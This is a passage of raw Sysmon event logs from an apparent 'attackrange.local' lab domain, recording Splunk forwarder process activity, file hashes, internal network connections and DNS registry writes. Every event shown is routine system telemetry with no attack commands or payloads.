Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=072202136AED2240DD7DBE6E77710312,SHA256=D9202AE5BB2C6A33B62A120B6732BA301585FDD2A99F15CDEB24C502CA03516F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90D-60EB-177E-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F90D-60EB-177E-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90D-60EB-177E-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.510{466BC892-F90D-60EB-177E-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.277{466BC892-F90C-60EB-167E-00000000CF01}73962248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:54.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE0C8F635A18A736AABA19ABE8C44740,SHA256=B185318C747ECD4EFE62078D16173B5CB85471892FD2145E4AEE14A207008EFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:54.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B01C883E430F46B550733700979ECE77,SHA256=0117AC8F48BAD28CFF1BCADC607AA36AC4662D78DF8BF3920A79836C83FC4639,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:54.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=731DDF146AA3BD63B685DB17E01BC9B6,SHA256=66C6E4A128E5C48CE42E755E25A9F5717E8ED99FEB6DE804ABDDCEB543FABECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.563{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57CC37870EAC652C9F554F5AEB54D692,SHA256=925A7717AF5B1E6EFC22AA34FC23282957679685AFD8A966DB3255E612B80593,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:53.211{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57503-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001055697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:46.584{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62014-false10.0.1.12-8000- 10341000x80000000000000001055696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90E-60EB-187E-00000000CF01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F90E-60EB-187E-00000000CF01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90E-60EB-187E-00000000CF01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.032{466BC892-F90E-60EB-187E-00000000CF01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:55.564{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A9B3CF3BC6ADC0899E29E3D0D75D6D,SHA256=4114BB7A164D5C4D6001A61C7CB3991DE37709FEE9CD1C3F3C55BD3001E79513,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:53.330{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om57250-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001055700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:47.269{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57504-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001055699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:55.032{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43E2E10DBA0AB0426A114EB3B2D965EC,SHA256=4B4D2BFA1AE567BC7E13DFCE187F73E6E6917364E98E1E5F8A13FCAE1494C1A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:56.595{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=257DE34B13F53894681BBCFC62B22AF3,SHA256=E13C2A6E6CEC7003DE14F6A92242F96F8C0E4705ACDD8AF8B8539ECD0A9EE589,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:53.882{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57504-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:55.999{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA35A1EFBDD4AA7D1436B06978FD5DF0,SHA256=890740B1528D4319AA70E56165800DE651343977F0DB66609464AC268597016E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:57.595{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B487AEC38E95B0A072E594A162BA5C4B,SHA256=068BB9B0EF6E321C898F22582142E9F4D0547A96A12E3824DAE809FFB09FE0E4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000810973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\RegisteredSinceBootDWORD (0x00000001) 13241300x8000000000000000810972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\StaleAdapterDWORD (0x00000000) 13241300x8000000000000000810971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\CompartmentIdDWORD (0x00000001) 13241300x8000000000000000810970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\FlagsDWORD (0x00000002) 13241300x8000000000000000810969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\TtlDWORD (0x000004b0) 13241300x8000000000000000810968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\SentPriUpdateToIpBinary Data 13241300x8000000000000000810967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\SentUpdateToIpBinary Data 13241300x8000000000000000810966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\DnsServersBinary Data 13241300x8000000000000000810965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\HostAddrsBinary Data 13241300x8000000000000000810964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\PrimaryDomainNameattackrange.local 13241300x8000000000000000810963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\AdapterDomainName(Empty) 13241300x8000000000000000810962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 